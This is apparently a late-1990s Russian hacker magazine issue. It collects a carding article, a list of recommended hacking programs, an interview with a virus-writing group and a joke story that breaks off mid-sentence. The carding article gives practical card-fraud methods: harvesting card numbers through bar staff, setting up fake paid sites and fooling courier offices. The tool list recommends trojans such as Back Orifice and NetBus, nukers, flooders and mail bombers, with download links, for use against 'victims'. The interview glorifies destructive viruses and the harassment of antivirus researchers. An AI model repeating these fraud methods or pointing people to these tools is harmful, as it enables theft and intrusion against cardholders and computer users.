Начнем сначала. Где хакеры берут карты. Вариант с копанием в мусоре (по-английски это называется trashing от trash = мусор) — в местных условиях им не подходит. Вообще хакеры не любят связываться с картами местных банков — здесь у банков фашистские условия, игра не стоит свеч. Самый простой способ — это попросить друга в Америке «списать» у знакомого бармена/официантки/продавщицы несколько номеров и имен с чужих карт.

Второй распространенный способ — взламывают какой-нибудь internet site, где недоумки оставляют номера своих карт (правда, для этого надо либо самому быть компьютерным взломщиком, либо иметь друзей-взломщиков, причем настоящих, а не болтунов, которых 99%).

Или — самый распространенный способ, которым пользуются грамотные хакеры: они открывают собственный сайт в Интернете, чаще всего порно-сервер. Все это делается с заголовками типа «У нас самые большие сиськи во всем Интернете и всего за $5,95 на 3 месяца!». Оплату доступа, естественно, делают по карте. Самое удивительное — это то, что идиотов хватает, уж поверь! Правда, для этого нужно уметь делать internet-site’ы и как следует поработать.

В общем, главное в любом деле — думать и работать. Кстати, надо добавить, что из-за фантастических масштабов мошенничества многие организации, принимающие карты по телефону/факсу/internet’у (то есть не имеющие возможности лично удостовериться в том, что ты — действительно владелец карты), требуют какую-нибудь специальную личную информацию, которую мошенник знать не должен бы. Например, его почтовый индекс (zip code). Или девичью фамилию матери. Таких мест мошенники избегают.

Вот мы и подошли

к следующей части.

Где кардеры покупают и как посылают. Да везде, где получится! Нет плохих мест, если предыдущий пункт выполнен с умом. Здесь есть одна тонкость — при получении посылки местная таможня потребует заплатить аж 50% от заявленной стоимости товара. А покупая у крупной фирмы, фиг их упросишь снизить заявленную стоимость. Но не зря говорят, что русские — очень изобретательная нация. Нашли таки способ! Объясняю. Технология покупки такова — они звонят (или — факсимилируют) в нужную фирму и требуют (именно требуют под угрозой отказа в оплате за покупку!), чтобы при отправке груза курьерской компанией (FedEx/DHL/TNT/UPS) фирма обязала курьеров оплатить таможню. Делают это так: на посылке пишется CUSTOMS DUTY 50% PAID. При этом курьерская компания в месте отправки выставляет магазину счет на сумму (сумма за перевозку + 50% от объявленной стоимости). Магазин добавляет эту сумму в общий счет и снимает ее с карты. А курьерская компания в месте получения расплачивается с местной таможней самостоятельно. При этом получается, что таможенный сбор оплачен по той же карте! Разумеется, нужно свободно говорить по-английски (а мошенник, не говорящий свободно по-английски, вызывает разве что вздох сочувствия). Правда, не все так сладко. Наша страна тоже сюрпризы делать умеет. А именно, придумывать заморочки с разделением таможенных платежей — НДС там разный, пошлина и таможенный сбор, так что даже это не гарантирует безболезненного прохождение экономической границы РОДИНЫ.


Спецвыпуск хакер, номер #001, стр. 001-064-3, Что такое кардинг? И сколько за него дают

Что такое кардинг? И сколько за него дают

Иван Говнов

Спецвыпуск хакер, номер #001, стр. 001-064-3

Как делают

грамотные кардеры

* Становятся «своими» в курьерской фирме! Отправляют посылку на произвольный адрес и фамилию и тут же — бегом в офис курьерской фирмы. Там спрашивают об отправлении на указанное имя. Конечно, в ответ им сообщают, что посылка в пути. Но они заходят на следующий день и снова спрашивают о ней. И так каждый день, даже по два раза. Спустя какое-то время их уже начинают узнавать в лицо, весь офис им сопереживает, и когда посылка доходит, ее отдают без проверки документов, так как и так считают кардера этим самым адресатом.

* Грамотные кардеры покупают мелкие и дорогие вещи. Слова PENTIUM и RAM так и просятся на язык, но на компьютерах зацикливаются только новички в кардинге. Есть много других замечательных вещей — драгоценности, например. Очень любят покупать мелкие автозапчасти на заказ. Или что-то для сотовых телефонов.

А знаешь, почему так много народу занимается кардингом, а сажают только единицы, в сравнении с этой толпой? Да потому, что когда кардеров ловят (а их обязательно ловят, если они занимаются этим регулярно), то они ни в чем не сознаются. Любой кардер понимает, что у милиции есть только то, что сам кардер им скажет. Нет, ну, конечно, оперативники начинают говорить «МЫ ВСЕ ЗНАЕМ!», «ТВОИ ДРУЗЬЯ СОЗНАЛИСЬ!», «ТЕБЯ ПОСАДЯТ, ЕСЛИ НЕ СОЗНАЕШЬСЯ!». Только ведь это вранье! Это даже в фильмах показывают. Даже Legion Of Doom об этом писал, и в учебнике террористов ИРА были прямые инструкции «как вести себя на допросе». Ну, и уж раз говорим начистоту, то скажем честно, что, естественно, когда кто-либо отказывается говорить с нашей доблестной милицией, то обязательно получает по морде, часто ногой. Но это гораздо лучше, чем получить статью и получать по морде уже каждый день.

Так что правосудие отдыхает очень часто, когда имеет дело с опытными кардерами.

Вот теперь и думай, что удобнее и безопаснее — наличные или

карточка!

Каким бы ты крутым кардером ни был, тебе все равно далеко до нашего родного правительства, Центрального банка и других российских банков.

Самая крупная кардерская акция была проведена 17 августа 1998 года.

Схема такова: Банки эмитируют (выпускают то бишь) свои собственные карты. Граждане открывают счета в банках и несут туда свои кровные. Через некоторое время правительство объявляет, что временно приостанавливает выплаты по внешним долгам и ценным бумагам, банки вслед за правительством объявляют, что временно приостанавливают операции по счетам и пластиковым картам. А, как известно, нет ничего более постоянного, чем временное... В результате банки получают твои денежки, а у тебя остается пара-тройка красивых сувениров в виде карточек с магнитной лентой и красивыми выдавленными на пластике буковками.


Спецвыпуск хакер, номер #001, стр. 001-064-4, Что такое кардинг? И сколько за него дают

Что такое кардинг? И сколько за него дают

Иван Говнов

Спецвыпуск хакер, номер #001, стр. 001-064-4

Так что чего же хакерам бояться, ес

ли на самом верху сидят такие крутые взломщики. Всем бы такую крышу!

Как мы и говорили, самые крутые хакеры в нашем правительстве и в разных банках. Вот, например, история про хакеров из банка «Балтийский» (для разнообразия — абсолютно правдивая). Этот петербургский банк знаменит на весь город, что выпустил больше других всяких пластиковых карточек (около 200 тысяч).

И тем, что имеет самые невоспитанные банкоматы. Когда клиент подходит к банкомату и вставляет в него свою карточку, на экране загорается надпись: «Выберете язык» — и варианты: русский, английский, немецкий, французский. Если выбрать любой иностранный язык, то банкомат будет работать так же, как и любой другой. Например, когда операция завершена и пластиковая карта покажется в прорези банкомата, на экране появится вежливое: «Please, remove your card» (то же — на немецком и французском). Но если выбрать русский язык, то после завершения расчетов на мониторе большими буквами загорится: «Немедленно выньте свою карту!». Вот так то! Иностранцам, понимаешь, «Please...», а нам русским людям хамят... Ну кто еще такое может придумать? Конечно хакеры!

По материалам

журнала «Деньги».


Спецвыпуск хакер, номер #001, стр. 001-066-1, Лучшие программы для Хакера

Лучшие программы для Хакера

Спецвыпуск хакер, номер #001, стр. 001-066-1

Mishgan[KpZ] (mishgan@hotmail.com icq: 1005765

Если X — твой любимый журнал, это означает только одно — ты наш человек! А еще, возможно, ты хочешь стать кул хацкером. И, конечно же, X всячески старается тебе в этом помочь. На самом деле существует два способа хакать. Первый: ты покупаешь кучу книг по устройству и работе Интернета, языкам программирования, операционным системам, протоколам, работе процессора и т.д. Ты все это внимательно читаешь, и через 2 года тренировок сможешь видеть все дырки и получать нужную тебе инфу без проблем. Но ведь ты лентяй! Не хочешь ты всякие занудные книжки читать, и то, чем отличается протокол TCP от ICMP, тебя волнует не больше, чем старые носки твоего соседа. И поэтому ты выбираешь второй способ: пусть другие парни книжки читают и программы пишут, а я уже воспользуюсь плодами их труда. Ну что ж, ладно, хорошо, не вопрос! Специально для таких, как ты, X подготовил «джентльменский набор» программок, которые тебе понадобятся во всех случаях жизни, коль уж ты решил, что в этой самой жизни хаку ты уделишь особое место. А помог нам в этом Мишган, мембер группы KpZ. Итак, вот тебе этот наборчик от Мишгана:

1 Back Orifice

http://www.crack-hack.com/files/soft/bo.zip

Эта хорошая программулина — троян. Состоит из сервера и клиента. Закидываешь клиента к неприятелю, и у жертвы открывается 31337 порт по умолчанию, что дает возможность несанкционированного доступа к его машине. Очень проста в обращении.

2 Flood Bot Front End

http://www.crack-hack.com/files/soft

/floodend.zip

Эта прога поможет тебе сбросить собеседника в IRC сети. Рулезная штучка .

3 Divine Intervention 3

http://www.crack-hack.com/files/soft /divint3.zip

Очень полезная программа. Содержит в себе нюкер, флудер, мэйл-бомбер. Эффективность гарантирована.

4 ICQ Flooder

http://www.crack-hack.com/files/soft /icqflood95.zip

Самый простой и самый эффективный, по моему мнению, ICQ флудер. Указываешь IP адрес, ICQ порт —

и вперед... Работает безотказно.

5 ICQ Ip Sniffer

http://www.crack-hack.com/files/soft /icqsniffer.zip

Простенькая программка для определения IP адреса по UIN’у в ICQ сети.

Очень проста в обращении. Приятный интерфейс.

6 WinNuke

http://www.crack-hack.com/files/soft /wnuke5.zip

Очень даже неплохая нюкалка. Качай — не пожалеешь. Запускаешь, и если у жертвы не стоит защита от нюков, то ему кранты — синий экран смерти. Есть опция сканирования портов .

7 Nuke Nabber 2.9

http://www.uic.nnov.ru/~bevi/KARDINAL /DOWNLOAD/nn29a.exe

Самый лучший анти-

нюкер. Он не только защищает тебя от 50 видов различных атак, но и засекает IP адрес нападавшего. Есть возможность добавления других портов. Эта прога — лидер в своем роде.

8 X Net Stat

http://security.lgg.ru/kardinal/DOWNLOAD /xnetstat.zip

Программа отслеживает все соединения по всем портам к твоему хосту. Очень полезная прога .

9 MultiLate

http://home.att.net/~craigchr/download.html

Программа удаления файлов

с невозможностью восстановления. Меня эта прога выручала не раз...

10 MP3 Friend

http://eternalsoft.hypermart.net/fiend /fiend.zip

Это самый рулезный поисковик MP3 файлов. Куча возможностей. Ищет на всех МП3’шных серваках. Найдешь все, что надо...


Спецвыпуск хакер, номер #001, стр. 001-066-2, Лучшие программы для Хакера

Лучшие программы для Хакера

Спецвыпуск хакер, номер #001, стр. 001-066-2

11 Mirc v5.5 Client

http://tucows.cadvision.com/files2 /mirc55t.exe

Качай скрипт: http://www.chatsite.net

/mafiascript60.exe

Клиент для входа в IRC сеть для Форточек. На мой взгляд, неплохая штука. Юзай для него скрипт «Мафия». (Есть еще прога PIRCH (www.pirch.org). Тоже IRC-клиент, только с лучшим интерфейсом —прим. редактора.).

12 Essential Net Tools

http://www.xbx.org/file/scanners /esstls11.exe

Этим сканером пользуется большинство народа. Включает в себя NetBios сканер, Nat interface и т.д.

13 Legion . NetBios Tool

http://207.98.195.250/software/legion.zip

Программа для сканирования подсетей (NetBios scan). Прикольный интерфейс, 2 способа занесения IP- адресов: возможность вводить адреса подсетей (до 64 с classа) и Scan list (ввод конкретных адресов). Некоторые замечания есть, но в целом, самая удобная программа для сканирования машин с поддержкой NetBios’а. Сама подключает сетевые диски.

14 Ident IRC crasher

http://www.xbx.org/file/irc/ircident.exe

Последний «писк моды»!!! Довольно простая, но весьма продвинутая программа. Она предназначена для закрытия mIRC какому-нибудь ламеру. Для этого достаточно знать его IP-адрес.

15 IRC Killer

http://www.xbx.org/file/ir/irckill.exe

Эта программа позволяет запускать FLOOD Bots на указанный канал с указанным Nickname. Если ты держишь зло на какой-либо

канал, то эта программа — хороший способ с ним расквитаться. Только будь аккуратнее с этим, злоупотребление может

привести к тому, что ты будешь

K-Lined (для тех, кто не знает

этого термина: K-line означает

то, что тебя занесут в «черный список» сети, и ты НИКОГДА

больше не сможешь зайти на эту сеть).

16 Icq ShutDown

http://www.xbx.org/file/icq/icqshutd.exe

Программа предназначенa для отключения юзера от ICQ. Тебе достаточно указать только его IP-адрес, а порт, к которому подключен ICQ, программа найдет сама путем их сканирования.

17 PortScan 7Phere

http://www.reket.com/port/portscan.zip

Программа сканирует заданный IP на использующие его порты. Задаются начальный и конечный порт для сканирования. Программа может быть полезна для проверки занятых/свободных портов для последующего их использования или же закрытия. Также предусмотрена опция Debug сканируемых портов и запись отчета сканирования в Log файл.

18 PortFuck

http://www.reket.com/port/portfuck.zip

Программа посылает кучу му

сора указанному юзеру на указанный порт. Периодичность указывается в поле Delay. PortFuck юзался некоторое время и зарекомендовал себя отлично.

19 KaBoom

http://www.reket.com/mail/kaboom3.zip

Самый лучший e-mail bomber. Очень быстрый, анонимный, имеет много полезных настроек. В программе есть набор (48) уже готовых e-mail list-ов для спамминга.

20 NetBus

Version 2.0 Pro

http://www.technicalw.freeserve.co.uk

/netbus2.zip

Вот и сбылась мечта идиотов. Вышел таки 2.0. Функций — до задницы. Я считаю этого троянца лучшим из существующих. Основные функции:

– Server Admin (set password, close server, restrict access)


Спецвыпуск хакер, номер #001, стр. 001-066-3, Лучшие программы для Хакера

Лучшие программы для Хакера

Спецвыпуск хакер, номер #001, стр. 001-066-3

– Host Info (system info, cached passwords)

– Message Manager

– File Manager (create/delete folder, upload/download/delete file)

– Window Manager

– Registry Manager

– Sound System Balance

– Plugin Manager

– Port Redirect

– Application Redirect

– File Actions (execute file, play sound, show image, opendocument, print document)

– Spy Functions (keyboard listen, capture screen image, capture camera video, record sound)

– Exit Windows (logoff, poweroff, reboot, shutdown)

– Client chat

– Open/Close CDROM

– Keyboard (disable keys, key click, restore keys)

– Mouse (swap buttons, resore buttons)

– Go To URL

– Send Text

21 Multi Trojan Cleaner

http://dynamsol.ulink.net/files

/cleaner2.exe

Если ты подозреваешь, что кто-то тебе подкинул-таки эту гадость (я про троянцев), качай эту программу, и она найдет заразу и уничтожит.

22 Icq 99a

ftp://ftp.freeware.ru/pub/internet/chat /icq99a.exe

Новая версия популярной программы. Сообщает, кто из твоих друзей находится в данный момент в сети. Позволяет переписываться в реальном времени, обмениваться сообщениями, файлами, запускать программы Интернет телефонии и др. Эта версия содержит множество новых функций.

23 Cyber Info HotMail Nofity

ftp://ftp.freeware.ru/pub/internet/mail /ciehot.zip

Проверяет почту на сервере Hotmail и обеспечивает быстрый доступ к странице Inbox или другим папкам, минуя страницу авторизации.

24 Штирлиц

ftp://ftp.freeware.ru/pub/internet/mail /shtirl3.exe

Автоматическая расшифровка электронных писем и текстов, прошедших сложные преобразования. HTML, Unicode, Quoted printable, uuencode, base64, сочетания всех русских кодировок, LAT, определение фрагментов с разной кодировкой и много других возможностей.

25 PGP

http:/www.pgpi.com/

Самая популярная программа шифрования с открытым ключом. Широко используется в электронной почте (e-mail).

Ну вот вроде бы и все.

Для начала

этого тебе хватит.

Большое спасибо

серверам:

http://www.freeware.ru/

Сервер бесплатных программ для Win95/98/NT.

http://www.crack-hack.com/

Хороший сервак военного софта.

http://www.xbx.org/

Кучи полезнейшего софта, просто РУЛЕЗ!

http://www.tucows.com/

Туча разных программ.

И не забывай проверять все на вирусы! Программисты тоже иногда шутят.

Желаю удачи, пока!

Применение некоторых из перечисленных программ в целях совершения неправомерных действий может привести к уголовной ответственности (как, впрочем, и использование в тех же целях кухонного ножа, топора, ксерокса или, например, монтировки).


Спецвыпуск хакер, номер #001, стр. 001-068-1, Вирусы

Вирусы

Спецвыпуск хакер, номер #001, стр. 001-068-1

LovinGOD, STEALTH group President,

http://sourceofkaos.com/stealth

Мы — вирмэйкерская группа STEALTH. Мы — создатели боевых роботов-убийц на просторах киберпространства. Именно наши малютки форматируют тебе винт, портят boot сектор и вешают машину. Именно мы когда-то создали вирусы SGWW.*. Maverick, Tchechen. И это все старое. Сейчас не стану называть названий, их есть у нас и у тебя — и под DOS, и под Win32, и под Макро. Нам особенно приятно было слышать о факапе, произведенном вирусами, в американском посольстве и представительствах фирм в Киеве, ведь там поработали и наши малютки.

Все начиналось в 94-м году в одном из институтов Киева. Второкурсника, тогда еще не Ловингода, допустили в самый крутой кабинет, где стояли лучшие машины института — EC-1842 — XT/8Mhz/1RAM/20Mb/EGA(!). Первым делом усатый шеф заставил конспектировать хелп к нортону. Суперкрутой шеф, знающий толк в компьютерах, позднее узнал, что такое вирусы, и обучился методике скоростного форматирования десятка машин на каждой перемене — лечить это было невозможно и нечем. Этот ад продолжался года два и был на тот момент главным рассадником вирусов в городе.

Еще у меня был друг, крутой хакер, к которому я ездил 150 км на электричке, чтобы поиграть в любимого LodeRunner’а на настоящей американской XTшке. Он меня учил ломать программы:

— Берешь EXEшник, делаешь копию. Меняешь не понравившиеся тебе циферки на другие. Сохраняешься. Запускаешь. Если что-то получилось — делаешь еще одну копию и продолжаешь извращать дальше. Иначе — назад.

Первым успехом были «не понравившиеся байтики» из Диггера — с первого раза удалось сделать мешки невидимыми. Интересно, сколько часов на это понадобилось бы «по уму» ?

Все мои поползновения к написанию игрушек на паскале обломала пятидюймовая дискета, на которой лежал почти дописанный карточный Бридж и Бомбер -самолет, бомбящий дома и спускающийся все ниже и ниже. Я его потом все-

таки дописал.

Вирусы были чем-то недостижимым и загадочным... Паскаль вскоре надоел, и на хлипкой пятидюймовке появились исходники с названиями типа mar.asm, содержащие вывод на экран строки ‘Fuck you, world!’ — желания кого-то приветствовать как-то не возникало. Фигня все это, вот на таймере сидеть и клаву перехватывать — другое дело. Но умные дяди профессора лишь отрывочно догадывались, что такое резидент, и слали меня на 0ffff:0000.

Впрочем, и этого плохого двойного слова они не знали. А вокруг шумели Elite и Dangerous Dave. Интересный игровой эффект достигался незаметным выдергиванием клавиатуры из гнезда, после чего у игрока начинался приступ вандализма в сопровождении нецензурных звуковых эффектов.

Пришлось брать Sourcer и раздалбывать демо эффект Yankee Doodle получилось.

Дискета с сотней вирусов, привезенная из Москвы, куда я ездил на концерт Sepultura в 92-м, помогла мне мало. Листинги были нечитабельны в силу моей неопытности. Пришлось придумывать алгоритм самому. Вирус был назван ‘383’ в честь одного 500 байтного русского выражения, из которого только эти три цифры в совокупности с другими словами могут быть пропущены в печать.


Спецвыпуск хакер, номер #001, стр. 001-068-2, Вирусы

Вирусы

Спецвыпуск хакер, номер #001, стр. 001-068-2

Он был посвящен «китайскому хакеру, убитому подлыми коммунистами», чью память предлагал почтить зависанием между 18:00 и 18:05. К счастью, этот уродец не сохранился — на него было страшно смотреть. После выпуска десятка более продвинутых вариантов, а выпускались они прямо там же, я понял, что буду писать дальше и больше. Где же взять информацию? Тут я познакомился с ломщиком игрушек по имени Crazy.

Сначала мы решили поделить класс напополам — 5 на 5, и высадить туда по своему вирусу, который будет гробить тачку, если попадет на соседнюю половину.

Crazy выпускает свой ‘Hardy Harlot’, который по рандому выдает одно из 64 сообщений. Не раз ко мне подбегали студенты из Ливии с вопросом, как реагировать на надпись «Я хочу спать, нажми ресет». Апофигеем была надпись «Сникерс — как у негра в...». Как раз в тот момент за тачкой сидел негр. Бедняжка аж побелел. Еще нельзя не отметить пророческое сообщение «Акции МММ падают», которые тогда еще падать не собирались.

Лимит знаний исчерпался, а вокруг все те же дубы преподы и бедный Данжерос Дэйв с соплей на шее. Надо кого-то искать. Об Интернете я узнал через год. Было ФИДО и ББСки. Туда и забросил я свое письмо — «Вирмэйкеры! Обьединяйтесь!» и абонентский ящик для писем. Для бумажных писем, как это ни дико сейчас звучит.

Киевское фидошное болото, мирно источавшее сероводород, взорвало. Был создан штаб по борьбе с Вирус Клубом, а возле абонентского ящика иногда дежурило несколько фидорасов. А мы тогда были белые и пушистые... А они крикливые и неактивные, и ничего у них не вышло. Сидели с Eternal Maverick’ом у меня на работе ночью и с телефона, не берущегося АОНом, раскидывали Maverick.1536 по киевским BBS.

— Новая версия чего-то там.

— Напиши «круче обычной», — подсказывал EM.

Вот в этот-то момент и была основана STEALTH group, в сентябре 1994 года в Киеве, на Украине. Создание группы было ознаменовано выпуском в свет первого журнала «Infected Voice» и первого вируса Maverick на киевские BBS. Вирус должен был быть деструктивным, однако автор перепутал и в процедуре стирания вместо ‘int 13’ написал ‘int 21’.Тем временем рекламная кампания продолжалась обклеиванием и разрисовыванием стен во время ночных прогулок по городу. Клеили на автобусных остановках, вместо названия остановки. Только «Кинотеатр Загреб» пожалели — я заклеил всего две буквы. Потом оторвали все-таки. А надпись карандашом на щите с названием станции метро продержалась больше года — много людей пришло именно по ней. Весь первый состав группы был собран таким вот способом — по обычной почте. Один хороший человек переписал мне 6 выпусков журнала ‘40Hex’. А почему бы ни выпустить журнал для вирмэйкеров на русском ? Журнал был назван по песне группы Sepultura «Infected Voice», а название группы придумал Crazy — «STEALTH».

На данный момент вышло 14 номеров журнала, не считая английских дайджестов,очередной номер доступен в онлайне на сайте группы.

Нельзя не отметить, что первый факап был устроен не с помощью этого вируса, а с помощью зараженного им Web’а, привезенного Crazy из Москвы. Этот новый антивирус лечил OneHalf, забывая расшифровать диск. А OneHalf как раз начал буйствовать.


Спецвыпуск хакер, номер #001, стр. 001-068-3, Вирусы

Вирусы

Спецвыпуск хакер, номер #001, стр. 001-068-3

Самая большая группа в мире — больше 50 человек, постепенно сошла на нет, только несколько человек оставались активными. Массовой организации не получилось. Да и не могло получиться. Вирмэйкерская организация не может быть большой...

Вскоре LovinGOD сьехал в Москву и, конечно, развил там бурную деятельность...

Прошло два года, и многое в группе пришлось переделывать.

Всего через группу прошло не менее 200 человек — где они сейчас, в том числе известный вирмэйкер Populizer, который сейчас переехал из Киева в Москву и работает на АВП, пытаясь всем доказать, что он не он — а пиво-то

вместе пили...

Пришлось долго чесать репу, прежде чем туда поселились новые идеи по организации. Удивительно, но за 4 года не удалось найти ни одного желающего полноценно руководить группой. Приходится делать это в одиночку, не без широкой помощи узкого круга людей.

Теперь членство в группе ограничено. Сначала новичок становится Кандидатом, после заполнения Анкеты и проверки несоответствия образу, «воспетому» антивирусными мЕнстрами. Полноценный DOS.COM.EXE.TSR.Crypt (Mutant). Antiheuristic.Win9X_Compatible и еще несколько условий переводят кандидата в действительные Члены группы, а дальше DOS’ом уже не ограничивается. Кандидату открыты все несекретные материалы группы, а также он может рассчитывать на помощь группы.

Кроме готовых и готовящихся вирмэйкеров, существует обширная группа поддержки — это содержание BBS, техническая и информационная помощь.

Для всех желающих приобщиться и пообщаться была создана сеть NASNet - Natural Anti Social Network. Оригинальное название взято по песне ГО. На данный момент она распространена в России, на Украине и среди англоязычных поСЕТИтелей. Построена на фидошном софте и распространяется по модему, ip и емэйлу. Туда принимаются все желающие с условием не сорить, не проводить пропаганду пацифизма, семейных ценностей и прообщественного образа жизни.

Территориально наибольшее количество людей находится в Москве, дальше идет Питер, Киев, отдельные города России и Украины, а также Колумбия и США. Возраст — от 16 до 24 лет. Ограничений по возрасту нет. Как правило, раз в неделю мы собираемся на тусовки, как написала одна газета, «в канализационных шахтах в районе Речного вокзала, которые они изрисовали сатанинскими символами» — впрочем, это мы тоже любим, но не там. В киберпространстве мы обитаем на irc-канале #stealth EFNet (для доступа нужно написать письмо, так он закрыт), общаемся по емэйлу и сети NASNet.

Музыкальные вкусы в основном делятся на 2 категории — металл и/или панк и разнообразный рэйв. Единодушно никто не слушает попсу.

За вирусы в новом УК существует статья. Поэтому группа не страдает излишней болтливостью, кто знает, что можно ожидать от Кодекса, в котором на полном серьезе записана статья 244: «Надругательство над телами умерших...» часть.3: «с применением насилия или угрозой его применения». Мы не имели проблем с законом, но готовиться надо к худшему, что придет дядя и скажет «кто не спрятался, я не виноват». В России сейчас в некотором роде анархия (за что я и люблю эту страну), и всем все по фигу. А так как нормальный вирус ДОЛЖЕН вызвать интерес и панику у властей и долбопорядочных обывателей, то отсутствие такого интереса расценивается как неэффективность вирусной индустрии.


Спецвыпуск хакер, номер #001, стр. 001-068-4, Вирусы

Вирусы

Спецвыпуск хакер, номер #001, стр. 001-068-4

В группе запрещено афишировать свое членство, подписывать вирусы своим именем и названием группы.

Основное направление деятельности — написание вирусов. С хакерами напряг, возможно потому, что слишком много людей считает себя таковыми, и мало кто умеет кататься на роликах, и пьют далеко не кока-колу :). С фриками тоже туговато, хотя каждый раз, когда я вставляю карточку, за которую заплатил деньги, в турникет, мне становится стыдно, как будто это не карточка, а нечто более неприличное.

Вирусная сцена в эксСССР сейчас далеко не на уровне. Вирмэйкерство теперь стало элитным занятием. Раньше достаточно было написать простой вирус, и эпидемия обеспечена. Поэтому вирмэйкеров было так много. Теперь выживают только сильнейшие вирусы, а средние по большей части не уходят дальше следующей после автора машины, если и уходят, то находят свою смерть во чреве какого-нибудь антивируса.

Подавляющее большинство людей становятся вирмэйкерами по очень прозаическим мотивам — желание скандальной славы, ламерство — показать себя крутым, похвастаться перед всеми, желание отомстить всему миру за собственную нежизнеспособность в нем, несчастная любовь или посвящение вируса своей... Эти люди позорят вирмэйкерское сообщество и дают повод для создания «коллективных портретов» правильным дядям из антивирусной промышленности.

Создавать коллективный неутешительный портрет вирмэйкера нынешнего я не буду, но опишу коллективный портрет вирмэйкера таким, каким он долженбыть, и к чему мы стремимся. Человек, лишенный комплексов, свободный от общественных «ценностей» и предрассудков, не верящий ни во что, кроме своих сил, качающийся не только пивом и умеющий играть в Мортал Комбат не только на компьютере (но и на Плейстейшен :-)). Человек, который не балуется вирусами, а создает их целенаправленно и осознанно, делает это профессионально, умеет хранить тайну и подавлять в себе проявления ламерства.

Вирмэйкерство — это наука о создании и использовании компьютерного оружия и боевых машин киберпространства, созидательный творческий процесс. Всякому механизму требуются испытания, которые лучше провести по полной программе — с полным боекомплектом и на живых мишенях. Мораль нужна слабым, чтобы посредством вдалбливания ее в мозги других обезопасить себя. Вирмэйкер не должен страдать никакими моральными заморочками, иначе он не сможет нажать «красную кнопку» и увидеть жизнь своего творения во всей красе, он должен быть безжалостен. В отношении к врагам — только холодный расчет и четкие действия. Используй или уничтожь.

Каковы перспективы развития вирусов ? Плохо освоенный Интернет, NT, которые скорее превратятся в подобие Win95. Бесконечная война с антивирусами и масса новых технологий.


Спецвыпуск хакер, номер #001, стр. 001-068-5, Вирусы

Вирусы

Спецвыпуск хакер, номер #001, стр. 001-068-5

В плане людей надеяться на лучшее не стоит. Массовости больше не будет, ее и сейчас уже нет. Псевдо-массовость испанских вирмэйкеров на самом деле — результат деятельности десятка-другого человек.

Необходимо объединение вирмэйкеров и интенсивный обмен технологиями, больше конспирации — чем дальше компьютеризируется общество, тем сильнее будут интересоваться такими людьми. Посмотрите на этот мир со стороны, попытайтесь забыть хоть на несколько секунд то, чем вас «кормили» мама с папой, школа, газеты, телевизор и недалекие одногруппники или одноклассники. Полностью забыть. Если вам это удастся, то вы навсегда останетесь игроком, а не игрушкой в руках общественной морали. И, если вы имеете какое-то отношение к компьютерам, то наверняка уйдете от написания цветных интерфейсов и займетесь более интересным и интеллектуальным делом.

Интервью

с LovinGOD’ом:

С.П: А тебе не кажется, что все это уже старо. Все это детские шалости. Для чего все это нужно? Цель-то какая-нибудь должна быть?

L: Мы не преследуем каких-либо идеологических целей, главная цель — наиболее интересно и остро играть в киберпространстве. Вирусы — самое интересное занятие — стратегическая игра на живом полигоне, наука о выживании в киберпространстве, создание новых видов более совершенного оружия и его испытания. Естественно, такая команда имеет шансы на выживание в реальном мире будущего, когда компьютерам отдадут все, и те, кто обладает знаниями в кибермире, будут стоять над обществом, диктующим всем правила всеобщей долбопорядочности и серости.

С.П.: Знаешь, я так и не понял, сколько на самом деле мемберов в группе?

L: Со времени выхода в свет статьи УК мемберам запрещено выдавать свое членство окружающим, подписываться своими именами в группе и именем группы в вирусах. Скажу, что не больше 10 — стандартный размер вирусной группы. Кандидатов больше, и группа поддержки тоже порядка 10.

С.П.: Меня интересует проблема борьбы создателей вирусов с создателями антивирусов. Можно что-нибудь об этом? Какую-нибудь историю, реальный пример?

L: В основном это борьба не с антивирусниками, а с их говнотворчеством. Вирус считается «сертифицированным» для дальнейших действий, если с ним не могут справиться известные антивирусы.

Из реальной жизни могу назвать только одну гадость — публикацию адресов и домашних телефонов известных антивирусников, а также несколько звонков г-ну Лозинскому — жаль, на разговор он идти не хотел и даже послал меня открытым текстом на три буквы, хотя я был намного корректнее остальных звонивших. Посылали телеграммы, минимальный почтовый перевод за «выдающиеся заслуги» к годовщинам, короче, прикалывались.

Реальные попытки пообщаться по душам были оставлены по молодости — антивирусники слишком зациклились на своем комплексе «спасателей человечества» и довольно грубо реагируют на нас, вирмэйкеров. Антивирусники — менты киберпространства, и мы всегда будем бороться с их действиями. Те, кто считают, что мы их «кормим», несколько не правы — по такой логике не должно быть «преступлений», чтобы не «кормить» ментов. Физическое


Спецвыпуск хакер, номер #001, стр. 001-071-1, Опасная игра со смертью

Опасная игра со смертью

Спецвыпуск хакер, номер #001, стр. 001-071-1

Шикель Грубый (s_gruby@hotmail.com)

Если выехать из города славного Новосибирска по лесной дороге, ведущей в Петропавловск-Камчатский, внимательный водитель заметит на пятом километре шесть неприметных холмиков, стыдливо примостившихся у зарослей кустов экзотического марципана. Каждый в год, в пятницу 25-ого февраля, у холмиков сих появляются траурные цветы. Что за загадочные могилы? — спросите вы, почесав в раздумье затылки. Именно здесь похоронены первые в нашей стране жертвы компьютерных вирусов: шестеро сотрудников одного из самых секретных «почтовых ящиков» России — НИИ Животноводчества и Аквариумистики.

История эта до сих пор скрывается в тщательной тайне, за семью печатями и тремя штампами ФСБ «совершенно секретно» на бумагах и файлах, так или иначе имевших отношение к делу «Пятницы Двадцать Пятого». Однако слухи о вирусе-убийце проникли в российскую печать, обретя самые невероятные формы — от сферической до октаэдра. Публикации центральных и новосибирских бульварных журналистов пытались убедить не менее бульварных читателей в существовании опасного и трагического вируса «двадцать пятого кадра», убивающего тех несчастных, которые на протяжении многих часов наблюдали его на экране. И все убийства, по их мнению, заканчивались смертью. Число 25 действительно имеет отношение к делу, но ни о каких кадрах на самом деле и речи не шло.

Я попытался восстановить картину трагедии, произошедшей в пятницу 25 февраля 1994 года. Мой поход в местный архив закончился успехом, я нашел требуемую картину кисти неизвестного художника Ш.Г.Сурового «Трагедия в НИИ», и после ряда дорогостоящих реставрационных работ восстановил ее. На полотне были изображены семеро людей в белых халатах, в смертельных судорогах икающих кровью у белоснежных мониторов «ViewSonic 15 GS». То, что жертв вируса было семь, а не шесть — по числу могил — меня весьма обескуражило, я бы даже сказал — озадачило. В углу картины виднелась рука неизвестной секретарши, набиравшей по телефону «03». Это навело меня на новые мысли и родило план следующего действия.

Мои стопы направились в местную реанимационную клинику. Усыпив бдительность медсестры лошадиной дозой цианистого калия, я пробрался в досье больницы за февраль 1994 года. Похоже, я напал на верный след — 25 числа, в пятницу, в больнице был новый завоз пациентов. Давайте я процитирую цитату главврача клиники:

